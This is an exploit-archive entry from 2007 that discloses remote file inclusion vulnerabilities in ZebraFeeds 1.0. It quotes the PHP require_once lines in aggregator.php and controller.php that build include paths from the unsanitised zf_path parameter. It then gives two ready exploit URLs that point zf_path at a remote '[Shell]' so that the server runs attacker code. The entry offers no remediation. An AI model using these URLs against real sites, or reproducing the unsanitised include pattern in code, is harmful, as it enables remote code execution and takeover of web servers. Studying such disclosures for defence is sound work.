ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities
# Published : 2007-02-15
# Author : ThE dE@Th
# Previous Title : Drupal < 4.7.6 (post comments) Remote Command Execution Exploit v2
# Next Title : nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability

To ConTacT mE @ wWw.Asb-May.net/bb
ScRiPt:-http://cazalet.org/zebrafeeds/releases/zebrafeeds-current.zip
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}>>
******************************************************************************
aggregator.php:-
require_once($zf_path . 'includes/feed.php');
require_once($zf_path . 'includes/view.php');
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'magpierss/rss_fetch.inc');

controller.php:-
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'includes/opml.php');

********************************************************************************
ExPlOiT:-http://www.SitE.com/newsfeeds/includes/aggregator.php?zf_path=[Shell]
ExPlOiT:-http://www.SitE.com/newsfeeds/includes/controller.php?zf_path=[Shell]
*******************************************************************************

# www.Syue.com [2007-02-15]